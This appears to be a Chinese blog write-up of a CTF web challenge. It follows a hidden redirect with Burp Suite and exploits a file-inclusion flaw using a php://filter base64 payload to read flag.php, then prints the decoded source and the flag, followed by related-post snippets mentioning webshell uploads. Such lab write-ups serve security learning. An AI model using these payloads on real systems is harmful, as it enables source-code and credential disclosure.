day1-5[极客大挑战 2019]Secret File

最新推荐文章于 2023-11-28 20:02:49 发布
最新推荐文章于 2023-11-28 20:02:49 发布
阅读量122 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44074767/article/details/113001198
版权

安全

[极客大挑战 2019]Secret File

1看颜色漆黑一片,下意识往下滑了一下,然后发现在最下面有个小秘密
在这里插入图片描述查看一下
2直接跳转到了end.php,欸~这事情不对呀
在这里插入图片描述然后回到上个界面将光标放在SECRET上面看左下角
在这里插入图片描述啊哈,抓到了,目标页面应该是去action.php的然后访问时出点小问题。。。
上神器 bp,设置好代理,开始抓包
在这里插入图片描述在这里插入图片描述随手丢到重放中 Ctrl+r ,然后点击下go
在这里插入图片描述发下还有一个页面 secr3t.php ,访问下
在这里插入图片描述又是审计。。。
和上一题一样又是伪协议,同样的这里并没过滤php协议,所以依旧可以base64查看源码
?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Yzc0NGRiNDctNjZmYi00NjFiLWE4MzktYzFlZThmODNiODE5fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
base64解密
3拿到flag

flag{c744db47-66fb-461b-a839-c1ee8f83b819}

顺手访问下flag.php页面
在这里插入图片描述至此一天5题,晚安了师傅们~

£仲夏☆如烟彡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2021-06-05 CTF Webbuuoj day13
LiNa_lInA_741的博客
06-11 187
CTF Web buu oj day13[极客挑战 2019]Knife类型解题[极客挑战 2019]Http类型解题[护网杯 2018]easy_tornado类型解题 [极客挑战 2019]Knife 类型 文件上传 解题 题目提示明显,一句话木马,使用蚁剑链接即可: 打开蚁剑右键添加数据: 地址为http://c2b35217-f0ba-463b-8473-d7073fc15a13.node3.buuoj.cn/index.php 连接密码提示了“Syc” 双击即可打开文件目录,到根目录/
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 808
目录[HCTF 2018]WarmUp[强网杯 2019]随便注[护网杯 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客挑战 2019]EasySQL[强网杯 2019]高明的黑客[极客挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
极客挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 805
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
【文件包含】[极客挑战 2019]Secret File---文件包含、PHP伪协议---day02
weixin_45807596的博客
05-18 53
一、界面一 进来以后乌漆嘛黑一片 啥都找不到,审查页面元素。 找到一个Oh!you found me 把这黑色背景改成白色。 完事点击进入下一个界面。 二、界面二 进去界面二还是漆黑一片,点一下secret试试。 这里啥也没有。 有点懵了,在哪儿呢?小秘密 看了下别人wp,在界面二点击后抓包看一下。 原来在界面二点击之后,有个重定向,马上跳转到界面三,界面撒提示回去仔细看看应该也是这个原因。 ...
从0到1——BUUCTF-Web刷题之旅
weixin_45848585的博客
12-29 3310
[HCTF 2018]WarmUp 查看网页源码 发现存在source.php 于是查看source.php http://0df7b2a6-36eb-4766-8481-62b98f795732.node3.buuoj.cn/source.php 查看source.php应该为index.php的代码 同时发现存在hint.php文件 查看发现存在提示信息 //source.php //代码包含两部分 定义emmm类用于check以及对传入参数进行校验 令一部分为对传入的file参数进行校验 <?
2021-06-03 CTF Webbuuoj day12
LiNa_lInA_741的博客
06-04 117
CTF Web buu oj day11[极客挑战 2019]Secret File类型解题[极客挑战 2019]LoveSQL类型解题 [极客挑战 2019]Secret File 类型 php、代码审计 解题 复习题,同day11的[ACTF2020 新生赛]Include。 右键查看源代码,发现下面有一个链接,颜色都是black所以看不到 访问Archive_room.php 但是如果点里面SECRET会访问action.php,然后直接打开是end.php结束了 只能用burpsuit
极客挑战2023 Web方向题解wp 全
Jay17的博客
11-28 4612
极客挑战2023 Web方向题解wp 全
BUU刷题记录(WEB-1)
Martin-share的博客
11-21 362
[强网杯 2019]随便注 [GYCTF2020]Blacklist[极客挑战 2019]PHP 序列化[网鼎杯 2020 青龙组]AreUSerialz[RoarCTF 2019]Easy Calc[护网杯 2018]easy_tornado SSTI[BJDCTF2020]The mystery of ip SSTI[极客挑战 2022] Not_Stay [GXYCTF2019]BabySQli[CISCN2019 华北赛区 Day2 Web1]Hack World[RoarCTF 2019
【web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1954
ctf_BUUCTF_web
AS400学习DAY1-DAY5
11-09
AS400学习DAY1-DAY5
AS400学习day1-day5
11-06
AS400学习
webservice 燕青 day1-1 共2天
03-27
webservice 燕青 day1-1 共2天 webservice 燕青 day1-1 共2天
vg-1day-2015-5-24
06-04
vg-1day-2015-5-19/ └── original ├── iOS-client │ ├── Makefile │ ├── My1DayApp │ │ ├── APIRequest.swift │ │ ├── AppDelegate.swift │ │ ├── Base.lproj │ │...
CTFhub-SQL注入
Moyv的博客
01-27 3017
CTFhub-SQL注入
CTFhub-目录遍历
Moyv的博客
01-26 709
CTFhub-目录遍历
python爬虫-基本数据类型
Moyv的博客
08-17 581
基本数据类型 1. 几个概念 1.1 表达式 • 表达式,是由数字、算符、数字分组符号(括号)、自由变量和约束变量等以能求得数值的有意义排列方法所得的组合 • 表达式特点 • 表达式一般仅仅用于计算一些结果,不会对程序产生实质性的影响 • 如果在交互模式中输入一个表达式,解释器会自动将表达式的结果输出 1.2 语句 • 一个语法上自成体系的单位,它由一个词或句法上有关连的一组词构成 • 语句的执行一般会对程序产生一定的影响,在交互模式中不一定会输出语句的执行结果 1.3程序(program) • 程序就是由
python爬虫-运算符
Moyv的博客
08-17 397
运算符
web基础入门和PHP语言基础入门 一
Moyv的博客
08-11 323
Web和PHP学习笔记
day--和--day区别
最新发布
04-18
1. "day--"是一个后缀自减操作符,用于将变量的值减1,并返回减1之前的值。例如,如果有一个变量day的值为5,执行day--操作后,day的值将变为4,并且表达式的结果为5。这个操作符通常用于循环或迭代中,用于递减...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值